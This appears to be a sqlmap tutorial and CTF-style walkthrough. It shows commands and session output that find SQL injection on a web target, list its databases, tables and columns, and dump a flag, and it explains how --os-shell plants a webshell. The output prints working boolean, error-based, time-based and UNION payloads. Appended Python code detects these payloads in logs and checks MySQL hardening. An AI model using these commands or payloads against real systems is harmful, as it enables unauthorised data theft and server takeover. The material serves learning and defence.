sqlmap基本使用

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Option reference

Launch command

python sqlmap.py -u <attack_url> <options>

Loading the target from a URL

  • -u quickly specifies the URL to test for SQL injection, including its parameters. It is suited to simple injection points in GET and POST parameters. sqlmap identifies likely injection points automatically; you can also append * to a parameter in the URL to mark it as the injection parameter.
  • -p specifies the parameter(s) to test; parameters named this way are tested regardless of --level.
  • --data specifies the POST body to send.
  • --cookie specifies the cookie, typically for injection points that require authentication.

Loading an HTTP request from a file (recommended)

  • -r loads an HTTP request from a file; use * inside it to mark a custom injection point.
python sqlmap.py -r http_payload/1.txt

http_payload/1.txt

GET /books/1* HTTP/1.1
Host: 182.202.178.28:31603
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: */*
Referer: http://182.202.178.28:31603/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

Here the path parameter 1 is marked as the injection parameter. Multiple injection points can be marked as well.

The marker is not limited to path segments; it can also be placed inside a JSON body, which is often the more convenient and sensible choice.

Detection level

--level sets the detection level, from 1 to 5; the default is 1.

The detection level affects not only which payloads are used but also which injection points are tested (GET and POST parameters are always tested).

Additional checks enabled at each level:

  • level >= 2 also tests cookies for injection
  • level >= 3 also tests the User-Agent and Referer headers
  • level >= 5 also tests the Host header

The level setting also affects other things, such as the range of column counts tried during UNION detection.

Non-interactive mode

--batch: run sqlmap non-interactively, taking the default answer to every prompt. An injection may go undetected as a result, but it is convenient for simple injection points.

Loading tamper scripts

base64 encoding

sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py

The --tamper option loads the base64 encoding tamper script, which automatically base64-encodes the generated payloads.

Data retrieval

Listing databases

--dbs lists all databases visible through an injection point that has already been confirmed.

C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -dbs
___
__H__
___ ___[(]_____ ___ ___ {1.8.8.6#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:36:38 /2024-10-15/

[10:36:38] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[10:36:39] [INFO] resuming back-end DBMS 'mysql'
[10:36:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- -
---
[10:36:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:36:44] [INFO] fetching database names
available databases [2]:
[*] book
[*] information_schema

[10:36:50] [INFO] fetched data logged to text files under 'C:\Users\24993\AppData\Local\sqlmap\output\182.202.178.28'

[*] ending @ 10:36:50 /2024-10-15/

Listing tables

-D: the database to use

--tables: list all visible tables in the specified database

C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book --tables
[*] starting @ 10:39:36 /2024-10-15/

[10:39:36] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:39:39] [INFO] resuming back-end DBMS 'mysql'
[10:39:39] [INFO] testing connection to the target URL
[10:39:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:39:45] [INFO] fetching tables for database: 'book'
Database: book
[2 tables]
+--------+
| books |
| secret |
+--------+

Listing columns

-T: the table to query

--columns: list all columns of the table

C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book -T secret --columns
[*] starting @ 10:40:30 /2024-10-15/

[10:40:30] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:40:32] [INFO] resuming back-end DBMS 'mysql'
[10:40:32] [INFO] testing connection to the target URL
[10:40:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:40:37] [INFO] fetching columns for table 'secret' in database 'book'
Database: book
Table: secret
[1 column]
+--------+-----------+
| Column | Type |
+--------+-----------+
| fl4g | char(255) |
+--------+-----------+

Dumping data

--dump: given a database, table and column(s), sqlmap fetches the data in those columns and exports it as a CSV file.

C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book -T secret -C fl4g --dump
[*] starting @ 10:41:06 /2024-10-15/

[10:41:06] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:41:08] [INFO] resuming back-end DBMS 'mysql'
[10:41:08] [INFO] testing connection to the target URL
[10:41:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:41:13] [INFO] fetching entries of column(s) 'fl4g' for table 'secret' in database 'book'
Database: book
Table: secret
[1 entry]
+---------------------------------+
| fl4g |
+---------------------------------+
| VIDAR{sqli_C4n_b3_d4ng3r0us!!!} |
+---------------------------------+
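The session outputs above show the four payload families sqlmap used against this target, and the tamper section shows how base64encode hides one of them from a filter that only looks at the raw value. The following is an added example, not part of the original post or of sqlmap: a constructed Python detector for the defending side that decodes each request target's path segments and query values (URL decoding, plus base64 decoding when a value looks like base64) before matching, and runs over constructed access-log lines modelled on those payloads. The rule names and the sample log are assumptions made for this example.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed rules for the payload families sqlmap reported above; not a sqlmap,
# WAF or vendor rule set.
RULES = [
    ("boolean-based blind", re.compile(r"'\s*(and|or)\s+\S+=\S+", re.I)),
    ("error-based (GTID_SUBSET)", re.compile(r"\bgtid_subset\s*\(", re.I)),
    ("time-based blind (SLEEP)", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("UNION query", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]

def views(value: str) -> list[str]:
    """Raw, URL-decoded and, when it looks like base64, base64-decoded forms:
    inspecting only the raw form is what the base64encode tamper relies on."""
    out = [value, unquote_plus(value)]
    for v in set(out):
        if re.fullmatch(r"[A-Za-z0-9+/]{8,}={0,2}", v):
            try:  # re-pad, then decode strictly; a non-base64 value is skipped
                out.append(base64.b64decode(v + "=" * (-len(v) % 4), validate=True).decode())
            except ValueError:  # covers binascii.Error and UnicodeDecodeError
                pass
    return out

def classify(target: str) -> set[str]:
    """Families found in any path segment or query value of a request target
    (the URI-segment and GET-parameter injection positions used on this page)."""
    parts = urlsplit(target)
    pieces = [seg for seg in parts.path.split("/") if seg]
    pieces += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return {name for piece in pieces for v in views(piece)
            for name, rx in RULES if rx.search(v)}

def scan_access_log(lines: list[str]) -> list[tuple[str, set[str]]]:
    """(request target, families) for every combined-format log line with a payload."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and (fam := classify(m.group(1))):
            hits.append((m.group(1), fam))
    return hits

# Constructed access-log lines modelled on the payloads in the session output.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Oct/2024:10:36:40 +0800] "GET /books/1 HTTP/1.1" 200 611',
    '203.0.113.7 - - [15/Oct/2024:10:36:41 +0800] "GET /books/1%27%20AND%208054=8054%20AND%20%27ggRL%27=%27ggRL HTTP/1.1" 200 611',
    '203.0.113.7 - - [15/Oct/2024:10:36:42 +0800] "GET /books/1%27%20OR%20SLEEP(5)%20AND%20%27poXy%27=%27poXy HTTP/1.1" 200 611',
    '203.0.113.7 - - [15/Oct/2024:10:36:43 +0800] "GET /books/-7734%27%20UNION%20ALL%20SELECT%2072,NULL,72--%20- HTTP/1.1" 200 900',
    '203.0.113.7 - - [15/Oct/2024:10:36:44 +0800] "GET /index.php?tel=LTEnIG9yICc4OCc9Jzg5 HTTP/1.1" 200 120',
]
```

Calling scan_access_log(SAMPLE_LOG) flags the last four lines and leaves the plain /books/1 request alone; the base64 value decodes to the same tautology the tamper section started from.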

Additional operations

--os-shell: prompt for an interactive operating-system shell

Conditions for using --os-shell:

  • the website's physical path is known
  • a high-privilege database user
  • secure_file_priv is unrestricted
  • the web directory is writable

How os-shell works: it writes a webshell file into a specific web directory and then controls the host through that PHP webshell.
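As an added example (not from the original post or from sqlmap), the constructed Python check below evaluates the two database-side prerequisites just listed from the results of SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS, so an operator can confirm that a web application account does not meet them. The account names, grants and function names are assumptions made for this example.

```python
import re

# Hypothetical hardening check written for this page. It evaluates the two
# database-side --os-shell prerequisites listed above from the results of
# SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS FOR <user>; the
# web-root path and directory write permission are host-side checks.

def file_priv_finding(secure_file_priv) -> str:
    """Classify secure_file_priv. None stands for the SQL NULL the server
    reports when file import/export is disabled entirely."""
    if secure_file_priv is None:
        return "disabled: secure_file_priv is NULL, no file import/export"
    if secure_file_priv.strip() == "":
        return "unrestricted: secure_file_priv is empty, any writable path"
    return f"restricted: file I/O limited to {secure_file_priv}"

def has_file_privilege(grants: list[str]) -> bool:
    """True if any GRANT line confers FILE. FILE is a global privilege, so
    only lines granted ON *.* matter; database-level grants cannot carry it."""
    for line in grants:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO\b", line, re.I)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False

def os_shell_exposure(secure_file_priv, grants: list[str]) -> dict:
    """Which database-side prerequisites the application account satisfies.
    Remediation: set secure_file_priv=NULL (or a dedicated directory) in my.cnf,
    it is not a dynamic variable, and revoke FILE / ALL PRIVILEGES ON *.*."""
    unrestricted = secure_file_priv is not None and secure_file_priv.strip() == ""
    file_priv = has_file_privilege(grants)
    return {
        "secure_file_priv": file_priv_finding(secure_file_priv),
        "secure_file_priv_unrestricted": unrestricted,
        "db_user_has_file_privilege": file_priv,
        "db_side_prerequisites_met": unrestricted and file_priv,
    }

# Constructed sample: a web application account with root-style grants and an
# unrestricted secure_file_priv, beside a least-privilege account.
EXPOSED = os_shell_exposure("", ["GRANT ALL PRIVILEGES ON *.* TO 'app'@'%'"])
HARDENED = os_shell_exposure(None, [
    "GRANT USAGE ON *.* TO 'app'@'localhost'",
    "GRANT SELECT, INSERT ON `book`.* TO 'app'@'localhost'",
])
```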